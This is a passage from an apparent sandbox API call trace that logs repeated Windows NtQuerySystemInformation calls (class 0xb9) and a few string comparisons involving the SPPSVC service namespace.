(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0273.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9c8, Length=0x50, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0273.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0273.365] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0273.366] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x28, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0273.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0273.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, 